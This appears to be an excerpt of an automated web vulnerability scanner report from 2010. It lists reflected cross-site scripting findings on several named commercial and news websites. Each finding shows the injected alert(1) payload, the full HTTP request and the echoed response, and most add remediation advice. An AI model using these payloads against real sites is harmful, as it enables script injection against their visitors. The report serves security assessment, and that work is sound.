The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2499"-alert(1)-"5cb28b9ac6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htma2499"-alert(1)-"5cb28b9ac6c HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html id="search-basic" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/ ...[SNIP]... 8340025&TS=nbt&OF=1&ACTION=log,red'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htma2499"-alert(1)-"5cb28b9ac6c?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.336. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /bp/Placerville-CA/PLA-L0122828089.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d4f"-alert(1)-"33ce433e8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htm?66d4f"-alert(1)-"33ce433e8f9=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1292727569056-www.superpages.com-18714612-159631; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:29 GMT; Path=/
Set-Cookie: JSESSIONID=66F1FC70EEAF1CB1A6E414D0EF269504; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32473
Date: Sun, 19 Dec 2010 02:59:28 GMT
Connection: close
var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm?66d4f"-alert(1)-"33ce433e8f9=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e52"-alert(1)-"3a80c3c814d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sun, 19 Dec 2010 03:05:14 GMT
Content-Length: 57389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxy91e52"-alert(1)-"3a80c3c814d?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D0122828089"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.338. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c029f"-alert(1)-"2312b370fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?c029f"-alert(1)-"2312b370fab=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;

Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74462
Date: Sun, 19 Dec 2010 03:43:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]... //yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/coupons?c029f"-alert(1)-"2312b370fab=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1690<script>alert(1)</script>81a15180fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /waf.srv/sjc1690<script>alert(1)</script>81a15180fdb/sj/cn HTTP/1.1
Host: www.swarmjam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5f8a<img%20src%3da%20onerror%3dalert(1)>b40aa474e63 was submitted in the REST URL parameter 3. This input was echoed as e5f8a<img src=a onerror=alert(1)>b40aa474e63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /waf.srv/sj/sje5f8a<img%20src%3da%20onerror%3dalert(1)>b40aa474e63/cn HTTP/1.1
Host: www.swarmjam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 59880<img%20src%3da%20onerror%3dalert(1)>f1606bba0a9 was submitted in the REST URL parameter 4. This input was echoed as 59880<img src=a onerror=alert(1)>f1606bba0a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /waf.srv/sj/sj/cn59880<img%20src%3da%20onerror%3dalert(1)>f1606bba0a9 HTTP/1.1
Host: www.swarmjam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServercx_auction_2_0=704651274.20480.0000; path=/
Date: Sun, 19 Dec 2010 02:58:56 GMT
Server: Apache/2.0.63 (Unix) mod_jk/1.2.15
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 3828
<html><head><title>Apache Tomcat/4.1.18 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} H3{font-family : sans-serif,Arial,Tahoma;co ...[SNIP]... <pre>javax.servlet.ServletException: Error: Site not found 'cn59880<img src=a onerror=alert(1)>f1606bba0a9' at com.cityxpress.taglib.common.dispatcher.WAFDispatcher.SetAttributes(WAFDispatcher.java:100) at com.cityxpress.taglib.common.dispatcher.WAFDispatcher.doGet(WAFDispatcher.java:115) at javax.servl ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 330d2'%3b5586b9f7d43 was submitted in the REST URL parameter 1. This input was echoed as 330d2';5586b9f7d43 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Business330d2'%3b5586b9f7d43/article/572653 HTTP/1.1
Host: www.thestar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:00:06 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age=600
X-TOPS-CacheReason: Article
Content-Length: 76019
Date: Sun, 19 Dec 2010 02:59:21 GMT
X-Varnish: 709048350
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=587273132.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_business330d2';5586b9f7d43_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick="> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd8c4'%3b132ab7b4bf5 was submitted in the REST URL parameter 2. This input was echoed as dd8c4';132ab7b4bf5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Business/dd8c4'%3b132ab7b4bf5/572653 HTTP/1.1
Host: www.thestar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Content-Length: 52461
Date: Sun, 19 Dec 2010 02:59:13 GMT
X-Varnish: 1642433058
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache-Svr: topsvarnish5-1
X-Cache: MISS
Set-Cookie: BIGipServerTOPS-WebFarm5=553718700.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987120/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_business_dd8c4';132ab7b4bf5_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick="> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb6"><script>alert(1)</script>55912517a0c was submitted in the REST URL parameter 1. This input was echoed as d5cb6\"><script>alert(1)</script>55912517a0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ticketstonightd5cb6"><script>alert(1)</script>55912517a0c/event.details.php?id=3001 HTTP/1.1
Host: www.ticketstonight.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:38:45 GMT
Server: Apache
Set-Cookie: sess_5bed166d3c=1af695cefe91f5f39f078f271cfea2cd; path=/
Expires: Sat, 18 Dec 2010 22:08:46 -0600
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Pragma:
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13641
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="javascript:MyHawaiiPrintPage('/ticketstonightd5cb6\"><script>alert(1)</script>55912517a0c/event.details.php?id=3001&print_format=1');"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1d65'%3b36b54885240 was submitted in the REST URL parameter 1. This input was echoed as c1d65';36b54885240 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businessc1d65'%3b36b54885240/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60792
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52305'%3b3c5d8e31179 was submitted in the REST URL parameter 1. This input was echoed as 52305';3c5d8e31179 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business52305'%3b3c5d8e31179/Private+secure+network+keeps+people+touch/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61448
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afd58'%3b30b3668cac6 was submitted in the REST URL parameter 2. This input was echoed as afd58';30b3668cac6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touchafd58'%3b30b3668cac6/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61421
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eef75'%3b47a26ddbae5 was submitted in the REST URL parameter 1. This input was echoed as eef75';47a26ddbae5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /businesseef75'%3b47a26ddbae5/Private+secure+network+keeps+people+touch/3448945/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61643
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aee4'%3ba81f74d1fd9 was submitted in the REST URL parameter 2. This input was echoed as 4aee4';a81f74d1fd9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch4aee4'%3ba81f74d1fd9/3448945/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 63813
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79dac'%3b02823d021e2 was submitted in the REST URL parameter 3. This input was echoed as 79dac';02823d021e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/344894579dac'%3b02823d021e2/ HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:02:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:02:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61557
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8d40'%3bb4f80011771 was submitted in the REST URL parameter 3. This input was echoed as d8d40';b4f80011771 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/3448945d8d40'%3bb4f80011771/story.html HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 95586 Expires: Sun, 19 Dec 2010 03:00:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:57 GMT Connection: close Set-Cookie: ASP.NET_SessionId=rs402tintjabs545lihkac45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://pluck.vancouve ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/ccn.com/business/private-secure-network-keeps-people-touch/3448945d8d40';b4f80011771/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=business;kw=private-secure-network-keeps-people-touch;kw=3448945d8d40';b4f80011771;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=256 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63d0'%3b344e98374ba was submitted in the REST URL parameter 4. This input was echoed as f63d0';344e98374ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/Private+secure+network+keeps+people+touch/3448945/f63d0'%3b344e98374ba HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:01:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:01:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61647
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16727'%3beba4bff93ee was submitted in the REST URL parameter 1. This input was echoed as 16727';eba4bff93ee in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /16727'%3beba4bff93ee HTTP/1.1 Host: www.vancouversun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:00:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:00:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 60693
1.354. http://www.viglink.com/account [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.viglink.com
Path: /account
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd5b"><script>alert(1)</script>9c7ef78ecd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /account?5dd5b"><script>alert(1)</script>9c7ef78ecd5=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
